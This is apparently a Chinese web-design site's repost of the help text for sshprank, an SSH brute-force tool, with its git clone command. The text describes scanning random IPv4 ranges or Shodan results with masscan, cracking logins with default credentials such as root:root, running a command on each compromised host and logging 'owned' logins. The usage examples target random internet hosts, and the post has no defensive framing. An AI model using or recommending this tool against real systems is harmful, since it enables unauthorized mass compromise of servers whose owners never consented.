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推广 2024-9-22编辑:深圳网站建设阅读(标签: WordPress 扫描器 爆破

sshprank SSH扫描器




1 git clone https://github.com/noptrix/sshprank.git


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 [ hacker@blackarch ~ ]$ sshprank -H               __                           __    __________/ /_  ____  _________ _____  / /__   / ___/ ___/ __ / __ / ___/ __ `/ __ / //_/ (__  |__  ) / / / /_/ / /  / /_/ / / / / ,< /____/____/_/ /_/ .___/_/   __,_/_/ /_/_/|_|                /_/       --== [ by nullsecurity.net ] ==-- usage   sshprank <mode> [opts] | <misc> modes   -h <host:[ports]>     - single host to crack. multiple ports can be seperated                           by comma, e.g.: 22,2022,22222 (default port: 22)   -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple                           ports can be seperated by comma (default port: 22)   -m <opts> [-r <num>]  - pass arbitrary masscan opts, portscan given hosts and                           crack for logins. found sshd services will be saved to                           'sshds.txt' in supported format for '-l' option and                           even for '-b'. use '-r' for generating random ipv4                           addresses rather than scanning given hosts. these                           options are always on: '-sS -oX - --open'.                           NOTE: if you intent to use the '--banner' option then                           you need to specify '--source-ip <some_ipaddr>' which                           is needed by masscan. better check masscan options!   -s <str;page;lim>     - search ssh servers using shodan and crack logins.                           see examples below. note: you need a better API key                           than this one i offer in order to search more than 100                           (= 1 page) ssh servers. so if you use this one use                           '1' for 'page'. don't bother me with this, bitch   -b <file>             - list of hosts to grab sshd banner from                           format: <host>[:ports]. multiple ports can be                           seperated by comma (default port: 22) options   -r <num>              - generate <num> random ipv4 addresses, check for open                           sshd port and crack for login (only with -m option!)   -c <cmd>              - execute this <cmd> on host if login was cracked   -u <user>             - single username (default: root)   -U <file>             - list of usernames   -p                    - single password (default: root)   -P <file>             - list of passwords   -C <file>             - list of user:pass combination   -x <num>              - num threads for parallel host crack (default: 20)   -S <num>              - num threads for parallel service crack (default: 20)   -X <num>              - num threads for parallel login crack (default: 20)   -B <num>              - num threads for parallel banner grabbing (default: 70)   -T <sec>              - num sec for connect timeout (default: 2s)   -R <sec>              - num sec for (banner) read timeout (default: 2s)   -o <file>             - write found logins to file. format:                           <host>:<port>:<user>:<pass> (default: owned.txt)   -e                    - exit after first login was found. continue with other                           hosts instead (default: off)   -v                    - verbose mode. show found logins, sshds, etc.                           (default: off) misc   -H                    - print help   -V                    - print version information examples   # crack targets from a given list with user admin, pw-list and 20 host-threads   $ sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20   # first scan then crack from founds ssh services   $ sudo sshprank -m '-p22,2022 --rate 5000 --source-ip     --range'   # generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s   # and crack login 'root:root' on found sshds   $ sudo sshprank -m '-p22 --rate=1000' -r 1000 -v   # search 50 ssh servers via shodan and crack logins using 'root:root' against   # found sshds   $ sshprank -s 'SSH;1;50'   # grab banners and output to file with format supported for '-l' option   $ sshprank -b hosts.txt > sshds2.txt


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